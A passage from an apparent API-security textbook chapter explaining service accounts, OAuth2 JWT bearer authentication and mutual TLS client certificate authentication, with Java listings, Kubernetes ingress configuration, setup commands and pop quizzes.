details such as role or group membership.
388
CHAPTER 11
Securing service-to-service APIs
token grants access to resources on its own and the identity of the client is ignored.
Fine-grained scopes can be used to limit the amount of access granted.
Alternatively, the client can avoid the client credentials grant and instead obtain an
access token for a service account. A service account acts like a regular user account and
is created in a central directory and assigned permissions and roles just like any other
account. This allows APIs to treat an access token issued for a service account the
same as an access token issued for any other user, simplifying access control. It also
allows administrators to use the same tools to manage service accounts that they use to
manage user accounts. Unlike a user account, the password or other credentials for a
service account should be randomly generated and of high entropy, because they
don’t need to be remembered by a human.
DEFINITION
A service account is an account that identifies a service rather
than a real user. Service accounts can simplify access control and account
management because they can be managed with the same tools you use to
manage users.
In a normal OAuth2 flow, such as the authorization code grant, the user’s web browser
is redirected to a page on the AS to login and consent to the authorization request.
For a service account, the client instead uses a non-interactive grant type that allows it
to submit the service account credentials directly to the token endpoint. The client
must have access to the service account credentials, so there is usually a service account
dedicated to each client. The simplest grant type to use is the Resource Owner Pass-
word Credentials (ROPC) grant type, in which the service account username and
password are sent to the token endpoint as form fields:
$ curl -u test:password \
-d 'grant_type=password&scope=a+b+c' \
-d 'username=serviceA&password=password' \
https://as.example.com/access_token
This will result in an access token being issued to the test client with the service
account serviceA as the resource owner.
WARNING
Although the ROPC grant type is more secure for service accounts
than for end users, there are better authentication methods available for ser-
vice clients discussed in sections 11.3 and 11.4. The ROPC grant type may be
deprecated or removed in future versions of OAuth.
The main downside of service accounts is the requirement for the client to manage
two sets of credentials, one as an OAuth2 client and one for the service account.
This can be eliminated by arranging for the same credentials to be used for both.
Alternatively, if the client doesn’t need to use features of the AS that require client
credentials, it can be a public client and use only the service account credentials
for access.
Send the client ID and
secret using Basic auth.
Pass the service account
password in the form data.
389
The JWT bearer grant for OAuth2
11.3
The JWT bearer grant for OAuth2
NOTE
To run the examples in this section, you’ll need a running OAuth2
authorization server. Follow the instructions in appendix A to configure the
AS and a test client before continuing with this section.
Authentication with a client secret or service account password is very simple, but suf-
fers from several drawbacks:
Some features of OAuth2 and OIDC require the AS to be able to access the raw
bytes of the client secret, preventing the use of hashing. This increases the risk
if the client database is ever compromised as an attacker may be able to recover
all the client secrets.
If communications to the AS are compromised, then an attacker can steal client
secrets as they are transmitted. In section 11.4.6, you’ll see how to harden access
tokens against this possibility, but client secrets are inherently vulnerable to
being stolen.
It can be difficult to change a client secret or service account password, espe-
cially if it is shared by many servers.
For these reasons, it’s beneficial to use an alternative authentication mechanism. One
alternative supported by many authorization servers is the JWT Bearer grant type for
OAuth2, defined in RFC 7523 (https://tools.ietf.org/html/rfc7523). This specifica-
tion allows a client to obtain an access token by presenting a JWT signed by a trusted
party, either to authenticate itself for the client credentials grant, or to exchange a
Pop quiz
1
Which of the following are differences between an API key and a user authentica-
tion token?
a
API keys are more secure than user tokens.
b
API keys can only be used during normal business hours.
c
A user token is typically more privileged than an API key.
d
An API key identifies a service or business rather than a user.
e
An API key typically has a longer expiry time than a user token.
2
Which one of the following grant types is most easily used for authenticating a
service account?
a
PKCE
b
Hugh Grant
c
Implicit grant
d
Authorization code grant
e
Resource owner password credentials grant
The answers are at the end of the chapter.
390
CHAPTER 11
Securing service-to-service APIs
JWT representing authorization from a user or service account. In the first case,
the JWT is signed by the client itself using a key that it controls. In the second case, the
JWT is signed by some authority that is trusted by the AS, such as an external OIDC
provider. This can be useful if the AS wants to delegate user authentication and con-
sent to a third-party service. For service account authentication, the client is often
directly trusted with the keys to sign JWTs on behalf of that service account because
there is a dedicated service account for each client. In section 11.5.3, you’ll see how
separating the duties of the client from the service account authentication can add an
extra layer of security.
By using a public key signature algorithm, the client needs to supply only the pub-
lic key to the AS, reducing the risk if the AS is ever compromised because the public
key can only be used to verify signatures and not create them. Adding a short expiry
time also reduces the risks when authenticating over an insecure channel, and some
servers support remembering previously used JWT IDs to prevent replay.
Another advantage of JWT bearer authentication is that many authorization serv-
ers support fetching the client’s public keys in JWK format from a HTTPS endpoint.
The AS will periodically fetch the latest keys from the endpoint, allowing the client to
change their keys regularly. This effectively bootstraps trust in the client’s public keys
using the web PKI: the AS trusts the keys because they were loaded from a URI that
the client specified during registration and the connection was authenticated using
TLS, preventing an attacker from injecting fake keys. The JWK Set format allows the
client to supply more than one key, allowing it to keep using the old signature key
until it is sure that the AS has picked up the new one (figure 11.3).
client.example.com
AS
/jwks
The client publishes its public key
as a JWK on its own server.
The JWKSet URI is associated with the
client when it registers with the AS.
When the client authenticates to the AS, the AS fetches
its public key from the registered JWKSet URI.
Figure 11.3
The client publishes its public key to a URI it controls and registers this
URI with the AS. When the client authenticates, the AS will retrieve its public key over
HTTPS from the registered URI. The client can publish a new public key whenever it
wants to change the key.
391
The JWT bearer grant for OAuth2
11.3.1 Client authentication
To obtain an access token under its own authority, a client can use JWT bearer client
authentication with the client credentials grant. The client performs the same request
as you did in section 11.2, but rather than supplying a client secret using Basic authen-
tication, you instead supply a JWT signed with the client’s private key. When used for
authentication, the JWT is also known as a client assertion.
DEFINITION
An assertion is a signed set of identity claims used for authentica-
tion or authorization.
To generate the public and private key pair to use to sign the JWT, you can use key-
tool from the command line, as follows. Keytool will generate a certificate for TLS
when generating a public key pair, so use the -dname option to specify the subject
name. This is required even though you won’t use the certificate. You’ll be prompted
for the keystore password.
keytool -genkeypair \
-keystore keystore.p12 \
-keyalg EC -keysize 256 -alias es256-key \
-dname cn=test
TIP
Keytool picks an appropriate elliptic curve based on the key size, and in
this case happens to pick the correct P-256 curve required for the ES256 algo-
rithm. There are other 256-bit elliptic curves that are incompatible. In Java
12 and later you can use the -groupname secp256r1 argument to explicitly
specify the correct curve. For ES384 the group name is secp384r1 and for
ES512 it is secp521r1 (note: 521 not 512). Keytool can’t generate EdDSA
keys at this time.
You can then load the private key from the keystore in the same way that you did in
chapters 5 and 6 for the HMAC and AES keys. The JWT library requires that the key is
cast to the specific ECPrivateKey type, so do that when you load it. Listing 11.1 shows
the start of a JwtBearerClient class that you’ll write to implement JWT bearer authenti-
cation. Navigate to src/main/java/com/manning/apisecurityinaction and create a
new file named JwtBearerClient.java. Type in the contents of the listing and save the
file. It doesn’t do much yet, but you’ll expand it next. The listing contains all the import
statements you’ll need to complete the class.
package com.manning.apisecurityinaction;
import java.io.FileInputStream;
import java.net.URI;
import java.net.http.*;
import java.security.KeyStore;
Listing 11.1
Loading the private key
Specify the
keystore.
Use the EC algorithm
and 256-bit key size.
Specify a distinguished
name for the certificate.
392
CHAPTER 11
Securing service-to-service APIs
import java.security.interfaces.ECPrivateKey;
import java.util.*;
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.ECDSASigner;
import com.nimbusds.jose.jwk.*;
import com.nimbusds.jwt.*;
import static java.time.Instant.now;
import static java.time.temporal.ChronoUnit.SECONDS;
import static spark.Spark.*;
public class JwtBearerClient {
public static void main(String... args) throws Exception {
var password = "changeit".toCharArray();
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"),
password);
var privateKey = (ECPrivateKey)
keyStore.getKey("es256-key", password);
}
}
For the AS to be able to validate the signed JWT you send, it needs to know where to
find the public key for your client. As discussed in the introduction to section 11.3, a
flexible way to do this is to publish your public key as a JWK Set because this allows you
to change your key regularly by simply publishing a new key to the JWK Set. The Nim-
bus JOSE+JWT library that you used in chapter 5 supports generating a JWK Set from
a keystore using the JWKSet.load method, as shown in listing 11.2. After loading the
JWK Set, use the toPublicJWKSet method to ensure that it only contains public key
details and not the private keys. You can then use Spark to publish the JWK Set at a
HTTPS URI using the standard application/jwk-set+json content type. Make sure
that you turn on TLS support using the secure method so that the keys can’t be tam-
pered with in transit, as discussed in chapter 3. Open the JwtBearerClient.java file
again and add the code from the listing to the main method, after the existing code.
WARNING
Make sure you don’t forget the .toPublicJWKSet() method call.
Otherwise you’ll publish your private keys to the internet!
var jwkSet = JWKSet.load(keyStore, alias -> password)
.toPublicJWKSet();
secure("localhost.p12", "changeit", null, null);
get("/jwks", (request, response) -> {
response.type("application/jwk-set+json");
return jwkSet.toString();
});
Listing 11.2
Publishing a JWK Set
Cast the private key
to the required type.
Load the JWK Set from the keystore.
Ensure it contains
only public keys.
Publish the JWK Set
to a HTTPS endpoint
using Spark.
393
The JWT bearer grant for OAuth2
The Nimbus JOSE library requires the Bouncy Castle cryptographic library to be
loaded to enable JWK Set support, so add the following dependency to the Maven
pom.xml file in the root of the Natter API project:
<dependency>
<groupId>org.bouncycastle</groupId>
<artifactId>bcpkix-jdk15on</artifactId>
<version>1.66</version>
</dependency>
You can now start the client by running the following command in the root folder of
the Natter API project:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.JwtBearerClient
In a separate terminal, you can then test that the public keys are being published by
running:
curl https://localhost:4567/jwks > jwks.txt
The result will be a JSON object containing a single keys field, which is an array of
JSON Web Keys.
By default, the AS server running in Docker won’t be able to access the URI that
you’ve published the keys to, so for this example you can copy the JWK Set directly
into the client settings. If you’re using the ForgeRock Access Management software
from appendix A, then log in to the admin console as amadmin as described in the
appendix and carry out the following steps:
1
Navigate to the Top Level Realm and click on Applications in the left-hand
menu and then OAuth2.0.
2
Click on the test client you registered when installing the AS.
3
Select the Signing and Encryption tab, and then copy and paste the contents of
the jwks.txt file you just saved into the Json Web Key field.
4
Find the Token Endpoint Authentication Signing Algorithm field just above the
JWK field and change it to ES256.
5
Change the Public Key Selector field to “JWKs” to ensure the keys you just con-
figured are used.
6
Finally, scroll down and click Save Changes at the lower right of the screen.
11.3.2 Generating the JWT
A JWT used for client authentication must contain the following claims:
The sub claim is the ID of the client.
An iss claim that indicates who signed the JWT. For client authentication this is
also usually the client ID.
394
CHAPTER 11
Securing service-to-service APIs
An aud claim that lists the URI of the token endpoint of the AS as the intended
audience.
An exp claim that limits the expiry time of the JWT. An AS may reject a client
authentication JWT with an unreasonably long expiry time to reduce the risk of
replay attacks.
Some authorization servers also require the JWT to contain a jti claim with a unique
random value in it. The AS can remember the jti value until the JWT expires to
prevent replay if the JWT is intercepted. This is very unlikely because client authen-
tication occurs over a direct TLS connection between the client and the AS, but the
use of a jti is required by the OpenID Connect specifications, so you should add
one to ensure maximum compatibility. Listing 11.3 shows how to generate a JWT in
the correct format using the Nimbus JOSE+JWT library that you used in chapter 6.
In this case, you’ll use the ES256 signature algorithm (ECDSA with SHA-256), which
is widely implemented. Generate a JWT header indicating the algorithm and the
key ID (which corresponds to the keystore alias). Populate the JWT claims set values
as just discussed. Finally, sign the JWT to produce the assertion value. Open the
JwtBearerClient.java file and type in the contents of the listing at the end of the main
method.
var clientId = "test";
var as = "https://as.example.com:8080/oauth2/access_token";
var header = new JWSHeader.Builder(JWSAlgorithm.ES256)
.keyID("es256-key")
.build();
var claims = new JWTClaimsSet.Builder()
.subject(clientId)
.issuer(clientId)
.expirationTime(Date.from(now().plus(30, SECONDS)))
.audience(as)
.jwtID(UUID.randomUUID().toString())
.build();
var jwt = new SignedJWT(header, claims);
jwt.sign(new ECDSASigner(privateKey));
var assertion = jwt.serialize();
Once you’ve registered the JWK Set with the AS, you should then be able to generate
an assertion and use it to authenticate to the AS to obtain an access token. Listing 11.4
shows how to format the client credentials request with the client assertion and send it
to the AS an HTTP request. The JWT assertion is passed as a new client_assertion
parameter, and the client_assertion_type parameter is used to indicate that the
assertion is a JWT by specifying the value:
urn:ietf:params:oauth:client-assertion-type:jwt-bearer
Listing 11.3
Generating a JWT client assertion
Create a header with
the correct algorithm
and key ID.
Set the subject and issuer
claims to the client ID.
Add a short
expiration time.
Set the audience
to the AS token
endpoint.
Add a
random JWT
ID claim to
prevent
replay.
Sign the
JWT with the
private key.
395
The JWT bearer grant for OAuth2
The encoded form parameters are then POSTed to the AS token endpoint using the
Java HTTP library. Open the JwtBearerClient.java file again and add the contents of
the listing to the end of the main method.
var form = "grant_type=client_credentials&scope=create_space" +
"&client_assertion_type=" +
"urn:ietf:params:oauth:client-assertion-type:jwt-bearer" +
"&client_assertion=" + assertion;
var httpClient = HttpClient.newHttpClient();
var request = HttpRequest.newBuilder()
.uri(URI.create(as))
.header("Content-Type", "application/x-www-form-urlencoded")
.POST(HttpRequest.BodyPublishers.ofString(form))
.build();
var response = httpClient.send(request,
HttpResponse.BodyHandlers.ofString());
System.out.println(response.statusCode());
System.out.println(response.body());
Run the following Maven command to test out the client and receive an access token
from the AS:
mvn -q clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.JwtBearerClient
After the client flow completes, it will print out the access token response from the AS.
11.3.3 Service account authentication
Authenticating a service account using JWT bearer authentication works a lot like client
authentication. Rather than using the client credentials grant, a new grant type named
urn:ietf:params:oauth:grant-type:jwt-bearer
is used, and the JWT is sent as the value of the assertion parameter rather than the
client_assertion parameter. The following code snippet shows how to construct the
form when using the JWT bearer grant type to authenticate using a service account:
var form = "grant_type=" +
"urn:ietf:params:oauth:grant-type:jwt-bearer" +
"&scope=create_space&assertion=" + assertion;
The claims in the JWT are the same as those used for client authentication, with the
following exceptions:
The sub claim should be the username of the service account rather than the
client ID.
The iss claim may also be different from the client ID, depending on how the
AS is configured.
Listing 11.4
Sending the request to the AS
Build the form
content with the
assertion JWT.
Create
the POST
request to
the token
endpoint.
Send the request and
parse the response.
Use the jwt-bearer
grant type.
Pass the JWT as
the assertion
parameter.
396
CHAPTER 11
Securing service-to-service APIs
There is an important difference in the security properties of the two methods, and
this is often reflected in how the AS is configured. When the client is using a JWT to
authenticate itself, the JWT is a self-assertion of identity. If the authentication is suc-
cessful, then the AS issues an access token authorized by the client itself. In the JWT
bearer grant, the client is asserting that it is authorized to receive an access token on
behalf of the given user, which may be a service account or a real user. Because the
user is not present to consent to this authorization, the AS will usually enforce stron-
ger security checks before issuing the access token. Otherwise, a client could ask for
access tokens for any user it liked without the user being involved at all. For example,
an AS might require separate registration of trusted JWT issuers with settings to limit
which users and scopes they can authorize access tokens for.
An interesting aspect of JWT bearer authentication is that the issuer of the JWT
and the client can be different parties. You’ll use this capability in section 11.5.3 to
harden the security of a service environment by ensuring that pods running in Kuber-
netes don’t have direct access to privileged service credentials.
11.4
Mutual TLS authentication
JWT bearer authentication is more secure than sending a client secret to the AS, but
as you’ve seen in section 11.3.1, it can be significantly more complicated for the client.
OAuth2 requires that connections to the AS are made using TLS, and you can use
TLS for secure client authentication as well. In a normal TLS connection, only the
server presents a certificate that authenticates who it is. As explained in chapter 10,
Pop quiz
3
Which one of the following is the primary reason for preferring a service account
over the client credentials grant?
a
Client credentials are more likely to be compromised.
b
It’s hard to limit the scope of a client credentials grant request.
c
It’s harder to revoke client credentials if the account is compromised.
d
The client credentials grant uses weaker authentication than service accounts.
e
Clients are usually private to the AS while service accounts can live in a shared
repository.
4
Which of the following are reasons to prefer JWT bearer authentication over cli-
ent secret authentication? (There may be multiple correct answers.)
a
JWTs are simpler than client secrets.
b
JWTs can be compressed and so are smaller than client secrets.
c
The AS may need to store the client secret in a recoverable form.
d
A JWT can have a limited expiry time, reducing the risk if it is stolen.
e
JWT bearer authentication avoids sending a long-lived secret over the network.
The answers are at the end of the chapter.
397
Mutual TLS authentication
this is all that is required to set up a secure channel as the client connects to the
server, and the client needs to be assured that it has connected to the right server and
not a malicious fake. But TLS also allows the client to optionally authenticate with a
client certificate, allowing the server to be assured of the identity of the client and use
this for access control decisions. You can use this capability to provide secure authenti-
cation of service clients. When both sides of the connection authenticate, this is
known as mutual TLS (mTLS).
TIP
Although it was once hoped that client certificate authentication would
be used for users, perhaps even replacing passwords, it is very seldom used.
The complexity of managing keys and certificates makes the user experience
very poor and confusing. Modern user authentication methods such as Web-
Authn (https://webauthn.guide) provide many of the same security benefits
and are much easier to use.
11.4.1 How TLS certificate authentication works
The full details of how TLS certificate authentication works would take many chapters
on its own, but a sketch of how the process works in the most common case will help
you to understand the security properties provided. TLS communication is split into
two phases:
1
An initial handshake, in which the client and the server negotiate which cryp-
tographic algorithms and protocol extensions to use, optionally authenticate
each other, and agree on shared session keys.
2
An application data transmission phase in which the client and server use the
shared session keys negotiated during the handshake to exchange data using
symmetric authenticated encryption.2
During the handshake, the server presents its own certificate in a TLS Certificate mes-
sage. Usually this is not a single certificate, but a certificate chain, as described in chap-
ter 10: the server’s certificate is signed by a certificate authority (CA), and the CA’s
certificate is included too. The CA may be an intermediate CA, in which case another
CA also signs its certificate, and so on until at the end of the chain is a root CA that is
directly trusted by the client. The root CA certificate is usually not sent as part of the
chain as the client already has a copy.
RECAP
A certificate contains a public key and identity information of the sub-
ject the certificate was issued to and is signed by a certificate authority. A certifi-
cate chain consists of the server or client certificate followed by the certificates
of one or more CAs. Each certificate is signed by the CA following it in the
chain until a root CA is reached that is directly trusted by the recipient.
2 There are additional sub-protocols that are used to change algorithms or keys after the initial handshake and
to signal alerts, but you don’t need to understand these.
398
CHAPTER 11
Securing service-to-service APIs
To enable client certificate authentication, the server sends a CertificateRequest mes-
sage, which requests that the client also present a certificate, and optionally indicates
which CAs it is willing to accept certificates signed by and the signature algorithms it
supports. If the server doesn’t send this message, then the client certificate authentica-
tion is disabled. The client then responds with its own Certificate message containing
its certificate chain. The client can also ignore the certificate request, and the server
can then choose whether to accept the connection or not.
NOTE
The description in this section is of the TLS 1.3 handshake (simpli-
fied). Earlier versions of the protocol use different messages, but the process
is equivalent.
If this was all that was involved in TLS certificate authentication, it would be no differ-
ent to JWT bearer authentication, and the server could take the client’s certificates
and present them to other servers to impersonate the client, or vice versa. To prevent
this, whenever the client or server present a Certificate message TLS requires them to
also send a CertificateVerify message in which they sign a transcript of all previous mes-
sages exchanged during the handshake. This proves that the client (or server) has
control of the private key corresponding to their certificate and ensures that the sig-
nature is tightly bound to this specific handshake: there are unique values exchanged
in the handshake, preventing the signature being reused for any other TLS session. The
session keys used for authenticated encryption after the handshake are also derived from
these unique values, ensuring that this one signature during the handshake effectively
authenticates the entire session, no matter how much data is exchanged. Figure 11.4
shows the main messages exchanged in the TLS 1.3 handshake.
LEARN ABOUT IT
We’ve only given a brief sketch of the TLS handshake pro-
cess and certificate authentication. An excellent resource for learning more is
Bulletproof SSL and TLS by Ivan Ristic´ (Feisty Duck, 2015).
Pop quiz
5
To request client certificate authentication, the server must send which one of
the following messages?
a
Certificate
b
ClientHello
c
ServerHello
d
CertificateVerify
e
CertificateRequest
6
How does TLS prevent a captured CertificateVerify message being reused for a
different TLS session? (Choose one answer.)
a
The client’s word is their honor.
b
The CertificateVerify message has a short expiry time.
399
Mutual TLS authentication
11.4.2 Client certificate authentication
To enable TLS client certificate authentication for service clients, you need to config-
ure the server to send a CertificateRequest message as part of the handshake and to vali-
date any certificate that it receives. Most application servers and reverse proxies
c
The CertificateVerify contains a signature over all previous messages in the
handshake.
d
The server and client remember all CertificateVerify messages they’ve ever
seen.
The answers are at the end of the chapter.
Client
Server
ClientHello
ServerHello
CertificateRequest
Certificate
CertificateVerify
Finished
Certificate
CertificateVerify
Finished
Application data
The client starts the
handshake by sending
a ClientHello message.
The server includes a
CertificateRequest message
in its response if it supports
client certificate authentication.
The client then sends its
certificate chain and signs the
CertificateVerify message.
Figure 11.4
In the TLS handshake, the server sends its own certificate and can ask the
client for a certificate using a CertificateRequest message. The client responds with a
Certificate message containing the certificate and a CertificateVerify message proving that
it owns the associated private key.
400
CHAPTER 11
Securing service-to-service APIs
support configuration options for requesting and validating client certificates, but
these vary from product to product. In this section, you’ll configure the NGINX ingress
controller from chapter 10 to allow client certificates and verify that they are signed by
a trusted CA.
To enable client certificate authentication in the Kubernetes ingress controller, you
can add annotations to the ingress resource definition in the Natter project. Table 11.1
shows the annotations that can be used.
NOTE
All annotation values must be contained in double quotes, even if they
are not strings. For example, you must use nginx.ingress.kubernetes.io/
auth-tls-verify-depth: "1" to specify a maximum chain length of 1.
To create the secret with the trusted CA certificates to verify any client certificates, you
create a generic secret passing in a PEM-encoded certificate file. You can include mul-
tiple root CA certificates in the file by simply listing them one after the other. For the
examples in this chapter, you can use client certificates generated by the mkcert utility
that you’ve used since chapter 2. The root CA certificate for mkcert is installed into its
CAROOT directory, which you can determine by running
mkcert -CAROOT
Table 11.1
Kubernetes NGINX ingress controller annotations for client certificate authentication
Annotation
Allowed values
Description
nginx.ingress.kubernetes.io/
auth-tls-verify-client
on, off, optional,
or optional_no_ca
Enables or disables client certificate
authentication. If on, then a client
certificate is required. The optional
value requests a certificate and veri-
fies it if the client presents one. The
optional_no_ca option prompts
the client for a certificate but doesn’t
verify it.
nginx.ingress.kubernetes.io/
auth-tls-secret
The name of a Kuberne-
tes secret in the form
namespace/secret-
name
The secret contains the set of
trusted CAs to verify the client
certificate against.
nginx.ingress.kubernetes.io/
auth-tls-verify-depth
A positive integer
The maximum number of intermedi-
ate CA certificates allowed in the
client’s certificate chain.
nginx.ingress.kubernetes.io/
auth-tls-pass-certificate-
to-upstream
true or false
If enabled, the client’s certificate
will be made available in the ssl-
client-cert HTTP header to
servers behind the ingress.
nginx.ingress.kubernetes.io/
auth-tls-error-page
A URL
If certificate authentication fails,
the client will be redirected to this
error page.
401
Mutual TLS authentication
which will produce output like the following:
/Users/neil/Library/Application Support/mkcert
To import this root CA as a Kubernetes secret in the correct format, run the following
command:
kubectl create secret generic ca-secret -n natter-api \
--from-file=ca.crt="$(mkcert -CAROOT)/rootCA.pem"
Listing 11.5 shows an updated ingress configuration with support for optional client
certificate authentication. Client verification is set to optional, so that the API can sup-
port service clients using certificate authentication and users performing password
authentication. The TLS secret for the trusted CA certificates is set to natter-api/
ca-secret to match the secret you just created within the natter-api namespace.
Finally, you can enable passing the certificate to upstream hosts so that you can extract
the client identity from the certificate. Navigate to the kubernetes folder under the
Natter API project and update the natter-ingress.yaml file to add the new annotations
shown in bold in the following listing.
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: api-ingress
namespace: natter-api
annotations:
nginx.ingress.kubernetes.io/upstream-vhost:
"$service_name.$namespace.svc.cluster.local:$service_port"
nginx.ingress.kubernetes.io/auth-tls-verify-client: "optional"
nginx.ingress.kubernetes.io/auth-tls-secret: "natter-api/ca-secret"
nginx.ingress.kubernetes.io/auth-tls-verify-depth: "1"
nginx.ingress.kubernetes.io/auth-tls-pass-certificate-to-upstream:
"true"
spec:
tls:
- hosts:
- api.natter.local
secretName: natter-tls
rules:
- host: api.natter.local
http:
paths:
- backend:
serviceName: natter-api-service
servicePort: 4567
If you still have Minikube running from chapter 10, you can now update the ingress
definition by running:
kubectl apply -f kubernetes/natter-ingress.yaml
Listing 11.5
Ingress with optional client certificate authentication
Annotations to
allow optional
client certificate
authentication
402
CHAPTER 11
Securing service-to-service APIs
TIP
If changes to the ingress controller don’t seem to be working, check the
output of kubectl describe ingress -n natter-api to ensure the annota-
tions are correct. For further troubleshooting tips, check the official docu-
mentation at http://mng.bz/X0rG.
11.4.3 Verifying client identity
The verification performed by NGINX is limited to checking that the client provided
a certificate that was signed by one of the trusted CAs, and that any constraints speci-
fied in the certificates themselves are satisfied, such as the expiry time of the certifi-
cate. To verify the identity of the client and apply appropriate permissions, the ingress
controller sets several HTTP headers that you can use to check details of the client
certificate, shown in table 11.2.
Figure 11.5 shows the overall process. The NGINX ingress controller terminates the cli-
ent’s TLS connection and verifies the client certificate during the TLS handshake. After
the client has authenticated, the ingress controller forwards the request to the backend
service and includes the verified client certificate in the ssl-client-cert header.
The mkcert utility that you’ll use for development in this chapter sets the client
name that you specify as a Subject Alternative Name (SAN) extension on the certifi-
cate rather than using the Subject DN field. Because NGINX doesn’t expose SAN val-
ues directly in a header, you’ll need to parse the full certificate to extract it. Listing 11.5
shows how to parse the header supplied by NGINX into a java.security.cert
.X509Certificate object using a CertificateFactory, from which you can then
extract the client identifier from the SAN. Open the UserController.java file and add
the new method from listing 11.6. You’ll also need to add the following import state-
ments to the top of the file:
import java.io.ByteArrayInputStream;
import java.net.URLDecoder;
import java.security.cert.*;
Table 11.2
HTTP headers set by NGINX
Header
Description
ssl-client-verify
Indicates whether a client certificate was presented and, if so, whether
it was verified. The possible values are NONE to indicate no certificate
was supplied, SUCCESS if a certificate was presented and is valid, or
FAILURE:<reason> if a certificate was supplied but is invalid or not
signed by a trusted CA.
ssl-client-subject-dn
The Subject Distinguished Name (DN) field of the certificate if one was
supplied.
ssl-client-issuer-dn
The Issuer DN, which will match the Subject DN of the CA certificate.
ssl-client-cert
If auth-tls-pass-certificate-to-upstream is enabled, then
this will contain the full client certificate in URL-encoded PEM format.
403
Mutual TLS authentication
public static X509Certificate decodeCert(String encodedCert) {
var pem = URLDecoder.decode(encodedCert, UTF_8);
try (var in = new ByteArrayInputStream(pem.getBytes(UTF_8))) {
var certFactory = CertificateFactory.getInstance("X.509");
return (X509Certificate) certFactory.generateCertificate(in);
} catch (Exception e) {
throw new RuntimeException(e);
}
}
There can be multiple SAN entries in a certificate and each entry can have a different
type. Mkcert uses the DNS type, so the code looks for the first DNS SAN entry and
returns that as the name. Java returns the SAN entries as a collection of two-element
List objects, the first of which is the type (as an integer) and the second is the
actual value (either a String or a byte array, depending on the type). DNS entries
have type value 2. If the certificate contains a matching entry, you can set the client
ID as the subject attribute on the request, just as you’ve done when authenticating
users. Because the trusted CA issues client certificates, you can instruct the CA not
to issue a certificate that clashes with the name of an existing user. Open the User-
Controller.java file again and add the new constant and method definition from the
following listing.
Listing 11.6
Parsing a certificate
NGINX
ingress
Backend
service
Client
TLS handshake
Client certificate
ssl-client-cert:
...
ssl-client-verify:
SUCCESS
NGINX terminates the client TLS
connection and verifies the client
certificate as part of the handshake.
If authentication was successful, NGINX forwards
the client certificate to the backend service
in the
ssl-client-cert header and indicates
whether authentication was successful.
Figure 11.5
To allow client certificate authentication by external clients, you
configure the NGINX ingress controller to request and verify the client certificate
during the TLS handshake. NGINX then forwards the client certificate in the ssl-
client-cert HTTP header.
Decode the URL-encoding added by NGINX.
Parse the PEM-encoded
certificate using a
CertificateFactory.
404
CHAPTER 11
Securing service-to-service APIs
private static final int DNS_TYPE = 2;
void processClientCertificateAuth(Request request) {
var pem = request.headers("ssl-client-cert");
var cert = decodeCert(pem);
try {
if (cert.getSubjectAlternativeNames() == null) {
return;
}
for (var san : cert.getSubjectAlternativeNames()) {
if ((Integer) san.get(0) == DNS_TYPE) {
var subject = (String) san.get(1);
request.attribute("subject", subject);
return;
}
}
} catch (CertificateParsingException e) {
throw new RuntimeException(e);
}
}
To allow a service account to authenticate using a client certificate instead of username
and password, you can add a case to the UserController authenticate method that
checks if a client certificate was supplied. You should only trust the certificate if the
ingress controller could verify it. As mentioned in table 11.2, NGINX sets the header
ssl-client-verify to the value SUCCESS if the certificate was valid and signed by a
trusted CA, so you can use this to decide whether to trust the client certificate.
WARNING
If a client can set their own ssl-client-verify and ssl-client-
cert headers, they can bypass the certificate authentication. You should test
that your ingress controller strips these headers from any incoming requests.
If your ingress controller supports using custom header names, you can
reduce the risk by adding a random string to them, such as ssl-client-
cert-zOAGY18FHbAAljJV. This makes it harder for an attacker to guess the
correct header names even if the ingress is accidentally misconfigured.
You can now enable client certificate authentication by updating the authenticate
method to check for a valid client certificate and extract the subject identifier from
that instead. Listing 11.8 shows the changes required. Open the UserController.java
file again, add the lines highlighted in bold from the listing to the authenticate
method and save your changes.
public void authenticate(Request request, Response response) {
if ("SUCCESS".equals(request.headers("ssl-client-verify"))) {
processClientCertificateAuth(request);
return;
}
Listing 11.7
Parsing a client certificate
Listing 11.8
Enabling client certificate authentication
Extract the client
certificate from the
header and decode it.
Find the first SAN
entry with DNS type.
Set the service
account identity as
the subject of the
request.
If certificate
authentication was
successful, then
use the supplied
certificate.
405
Mutual TLS authentication
var credentials = getCredentials(request);
if (credentials == null) return;
var username = credentials[0];
var password = credentials[1];
var hash = database.findOptional(String.class,
"SELECT pw_hash FROM users WHERE user_id = ?", username);
if (hash.isPresent() && SCryptUtil.check(password, hash.get())) {
request.attribute("subject", username);
var groups = database.findAll(String.class,
"SELECT DISTINCT group_id FROM group_members " +
"WHERE user_id = ?", username);
request.attribute("groups", groups);
}
}
You can now rebuild the Natter API service by running
eval $(minikube docker-env)
mvn clean compile jib:dockerBuild
in the root directory of the Natter project. Then restart the Natter API and database
to pick up the changes,3 by running:
kubectl rollout restart deployment \
natter-api-deployment natter-database-deployment -n natter-api
After the pods have restarted (using kubectl get pods -n natter-api to check), you
can register a new service user as if it were a regular user account:
curl -H 'Content-Type: application/json' \
-d '{"username":"testservice","password":"password"}' \
https://api.natter.local/users
3 The database must be restarted because the Natter API tries to recreate the schema on startup and will throw
an exception if it already exists.
Mini project
You still need to supply a dummy password to create the service account, and some-
body could log in using that password if it’s weak. Update the UserController register-
User method (and database schema) to allow the password to be missing, in which
case password authentication is disabled. The GitHub repository accompanying the
book has a solution in the chapter11-end branch.
Otherwise, use the
existing password-
based authentication.
406
CHAPTER 11
Securing service-to-service APIs
You can now use mkcert to generate a client certificate for this account, signed by the
mkcert root CA that you imported as the ca-secret. Use the -client option to mkcert
to generate a client certificate and specify the service account username:
mkcert -client testservice
This will generate a new certificate for client authentication in the file testservice-
client.pem, with the corresponding private key in testservice-client-key.pem. You can
now log in using the client certificate to obtain a session token:
curl -H 'Content-Type: application/json' -d '{}' \
--key testservice-client-key.pem \
--cert testservice-client.pem \
https://api.natter.local/sessions
Because TLS certificate authentication effectively authenticates every request sent in
the same TLS session, it can be more efficient for a client to reuse the same TLS ses-
sion for many HTTP API requests. In this case, you can do without token-based authen-
tication and just use the certificate.
11.4.4 Using a service mesh
Although TLS certificate authentication is very secure, client certificates still must be
generated and distributed to clients, and periodically renewed when they expire. If
the private key associated with a certificate might be compromised, then you also
need to have processes for handling revocation or use short-lived certificates. These
are the same problems discussed in chapter 10 for server certificates, which is one of
the reasons that you installed a service mesh to automate handling of TLS configura-
tion within the network in section 10.3.2.
To support network authorization policies, most service mesh implementations
already implement mutual TLS and distribute both server and client certificates to the
